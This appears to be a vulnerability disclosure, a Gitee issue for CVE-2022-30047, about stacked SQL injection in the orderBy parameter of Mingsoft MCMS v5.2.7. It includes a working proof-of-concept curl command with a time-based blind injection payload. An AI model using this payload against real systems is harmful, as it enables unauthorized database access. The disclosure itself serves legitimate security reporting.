Headline
CVE-2022-30047: Mingsoft MCMS v5.2.7 SQL注入【前台】 · Issue #I54VLM · 铭飞/MCMS - Gitee.com
Mingsoft MCMS v5.2.7 was discovered to contain a SQL injection vulnerability in /mdiy/dict/listExcludeApp URI via orderBy parameter.
/mdiy/dict/listExcludeApp路由的orderBy参数存在堆叠SQL注入
证明
curl -w "%{time_total}\n" -i -I -X $'GET' $'http://127.0.0.1:8080/mdiy/dict/listExcludeApp?dictType=1&orderBy=1;select/**/if(substring((select/**/database()),1,4)=\'mcms\',sleep(3),1);'